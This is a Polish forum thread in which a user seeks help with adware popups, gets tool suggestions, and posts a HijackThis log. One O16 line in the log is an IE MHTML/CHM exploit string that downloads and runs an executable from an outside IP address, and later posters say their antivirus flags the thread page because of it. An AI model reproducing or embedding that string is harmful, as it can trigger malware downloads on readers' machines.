Wirus... ale jaki


(Lewy) #1

Mam problem z pewnym robakiem, za każdym razem gdy łącze się z netem wyświetla mi się okno przeglądarki z reklamą, w pasku tytułowym widnieje tytuł: New offer for you! TAkie okienko wyswietla mi sie co kilka minut... mało tego, skanowałem kilkoma skanerami, sprawdzilem kompa hijack'iem i ad-awar'em i nic nie wykryto. Oddałem swojego kompa do naprawy do serwisu (inne powody), przesiadłem się na kompa zastępczego i po kilku minutach znowu ujżałem okno przeglądarki... żeby było śmieszniej, weszłem tylko na strone dobreprogramy i pościągałem potrzebne mi pliki :shock: a żeby było jeszcze śmieszniej, mam ten sam problem w laptopie :evil: Czy jest możliwość, iż robala złapałem w serwisie dobreprogramy (pytanie głównie do moderatorów), i wreszcie czy można się jakoś pozbyć tego badziewia?


(fiesta) #2

Nie ma takiej możliwości. Wszystkie programy przed zamieszczeniem na vortalu sa dokładnie sprawdzane pod kątem obceności w nich jakiegoś badziewia.

Próbowałeś scanu programem CW Shredder??


(Bartex88) #3

Hmm ja nie znam tak wirusow po nazwie, ani tych zlosliwych skryptow, tak na moje oko to chyba uzywasz IE to jest bardzo powazny blad, przesiadz sie na inna przegladarke np. Mozille albo Avant Browser, napewno sa lepsze i bardziej bezpieczne, a co do tego wirusa to sprawdz co dziala w tle, moze sa jakies niepotrzebne rzeczy, przeinstaluj IE, sciagnij sobie program "Spybot - Search & Destroy" moze cos pomoze on jest dobry, a to ze na innych kompasz masz ten problem to napewno przez to ze wchodzisz na jakas stronke nie mowiem ze to dobrepogramy, a moze to przez jakis program ktory instalujesz, jakis shit poprostu, przeskanuj adware ale dodatkow rejestr.

pozdrawiam


(Lewy) #4

CW Shredder, Spybot - Search & Destroy nie probowalem, zaraz sprawdze


(Czterytel) #5

Przypuszczam że złapałeś trojana spróbuj metody "ręcznej"

http://forum.dobreprogramy.pl/viewtopic ... highlight=


(Damian) #6

W razie czego...Log z HijackThis


(Lewy) #7

thx, cwshredder wykryl i usunal: CWS.Smartsearch


(fiesta) #8

A czy problem zniknął ??

Jeżeli nie dostosuj się do porady Damiana.


(Lewy) #9

A teraz to mnie zamurowało. Za każdym razem gdy odwiedzam ten temat mój Norton krzyczy:

Norton AntiVirus blablabla

Object name: C:\Windows\Temp\sos213.tmp

Virus name: bloodhound.exploit.6

Po nieudanej próbie naprawy, plik zostaje za każdym razem usunięty.

UPDATE 22:24:

dalej wystepuje problem :frowning: oto log z ht:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe

C:\Program Files\Norton Internet Security\NISUM.EXE

C:\Program Files\Norton Internet Security\ccPxySvc.exe

C:\WINDOWS\System32\drivers\crauto.exe

E:\Program Files\Executive Software\Diskeeper\DkService.exe

C:\WINDOWS\System32\drivers\IMountSRV.exe

C:\Program Files\Norton AntiVirus\navapsvc.exe

C:\WINDOWS\System32\nvsvc32.exe

C:\WINDOWS\Explorer.EXE

C:\WINDOWS\SOUNDMAN.EXE

C:\Program Files\Common Files\Symantec Shared\ccApp.exe

C:\WINDOWS\Anvshell.exe

C:\Program Files\CyberLink\PowerVCRII\Agent.exe

C:\Program Files\WinFast\WFTVFM\WFWIZ.exe

C:\Program Files\Winamp\winampa.exe

D:\Real Player\RealPlay.exe

C:\PROGRA~1\Wanadoo\TaskbarIcon.exe

C:\WINDOWS\System32\ctfmon.exe

C:\Program Files\Messenger\msmsgs.exe

C:\WINDOWS\System32\wuauclt.exe

C:\Program Files\SAGEM\SAGEM F@st 800-840\DSLMON.exe

C:\Program Files\Wanadoo\EspaceWanadoo.exe

C:\Program Files\Wanadoo\ComComp.exe

C:\Program Files\Wanadoo\Watch.exe

E:\FlashGet\flashget.exe

C:\WINDOWS\System32\svchost.exe

C:\Program Files\Internet Explorer\iexplore.exe

E:\Gadu-Gadu\gg.exe

C:\Program Files\WinRAR\WinRAR.exe

C:\DOCUME~1\Damian\USTAWI~1\Temp\Rar$EX00.625\HijackThis.exe


R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Neostrada Plus wita Cie w Internecie

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Łącza

O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - E:\FLASHGET\jccatch.dll

O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll

O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll

O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx

O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - E:\FLASHGET\fgiebar.dll

O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE

O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"

O4 - HKLM\..\Run: [ccRegVfy] "C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe"

O4 - HKLM\..\Run: [Anvshell] C:\WINDOWS\Anvshell.exe

O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup

O4 - HKLM\..\Run: [nwiz] nwiz.exe /install

O4 - HKLM\..\Run: [Agent] C:\Program Files\CyberLink\PowerVCRII\Agent.exe

O4 - HKLM\..\Run: [WinFast Schedule] C:\Program Files\WinFast\WFTVFM\WFWIZ.exe

O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe

O4 - HKLM\..\Run: [Resume copy] copyfstq.exe /startup

O4 - HKLM\..\Run: [Encrypted Disk Auto Mount] rundll32.exe edshell.dll,MountAll

O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe

O4 - HKLM\..\Run: [RealTray] D:\Real Player\RealPlay.exe SYSTEMBOOTHIDEPLAYER

O4 - HKLM\..\Run: [WOOWATCH] C:\PROGRA~1\Wanadoo\Watch.exe

O4 - HKLM\..\Run: [WOOTASKBARICON] C:\PROGRA~1\Wanadoo\TaskbarIcon.exe

O4 - HKLM\..\Run: [Symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe

O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\ctfmon.exe

O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background

O4 - HKCU\..\Run: [Gadu-Gadu] "E:\Gadu-Gadu\gg.exe" /tray

O4 - HKCU\..\Run: [Fryderyk] E:\Program Files\Fryderyk\fryderyk.exe

O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe

O4 - Global Startup: DSLMON.lnk = C:\Program Files\SAGEM\SAGEM F@st 800-840\DSLMON.exe

O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE

O4 - Global Startup: Vypress Chat StartUp.lnk = C:\Program Files\Vypress Chat\vyc.exe

O8 - Extra context menu item: Download All by FlashGet - E:\FlashGet\jc_all.htm

O8 - Extra context menu item: Download using FlashGet - E:\FlashGet\jc_link.htm

O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll

O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - E:\FLASHGET\flashget.exe

O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - E:\FLASHGET\flashget.exe

O16 - DPF: {14A3221B-1678-1982-A355-7263B1281987} - ms-its:mhtml:file://C:\foo.mht!http://82.179.166.145/x15.chm::/trs15.exe

O17 - HKLM\System\CCS\Services\Tcpip\..\{6B786E0C-D4BB-42A8-BB8C-26D4AEC22979}: NameServer = 212.244.54.190,194.204.159.1

O17 - HKLM\System\CCS\Services\Tcpip\..\{EEEA836C-4950-4C99-921B-0831DFDB34DC}: NameServer = 194.204.152.34 217.98.63.164

O23 - Service: Symantec Event Manager - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe

O23 - Service: Symantec Password Validation Service - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe

O23 - Service: Symantec Proxy Service - Symantec Corporation - C:\Program Files\Norton Internet Security\ccPxySvc.exe

O23 - Service: crauto - Unknown - C:\WINDOWS\System32\drivers\crauto.exe

O23 - Service: Diskeeper - Executive Software International, Inc. - E:\Program Files\Executive Software\Diskeeper\DkService.exe

O23 - Service: IMountSRV - Unknown - C:\WINDOWS\System32\drivers\IMountSRV.exe

O23 - Service: Norton AntiVirus Auto Protect Service - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exe

O23 - Service: Norton Internet Security Accounts Manager - Symantec Corporation - C:\Program Files\Norton Internet Security\NISUM.EXE

O23 - Service: NVIDIA Display Driver Service - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe

O23 - Service: PMounter - Unknown - C:\WINDOWS\system32\PMounter.exe

O23 - Service: ScriptBlocking Service - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe

O23 - Service: Symantec Network Drivers Service - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe

(Bednarz17 87) #10

jak wchodze do tego tematu to kaspersky szaleje , mowi ze wykrył :

Attention Dangerous script detected.

Application C:\ Program Files\ Internet Explorer\iexplorer.exe

Page http:/.../viectopic.php?t=1... contains malicious code Exploit.HTML.Mht. Execution of this script was automatically blocked.

:hahaha::hahaha::hahaha::hahaha::hahaha:


(dRAGSTER!) #11

Taka sama informacja w okienku wyskakuje u mnie...ale tylko wtedy gdy mam wlaczonego flashgeta (okienko wyskakuje w IE pomimo ze domyslna przeg. ,mam ustawiona Firefoxa...po wylaczeniu Flashgeta problem mija..i rowniez zaden skaner nie wykrywa smieci...wiec czy masz akurat wlaczony FALSHGET..?


(Golden Finger) #12

Usuwasz z kompa pliki

Wyłącz przywracanie systemu.

Działaj w trybie awaryjnym.

Usuń katalogi z Temporary Internet Files\Content.IE5

:okulary: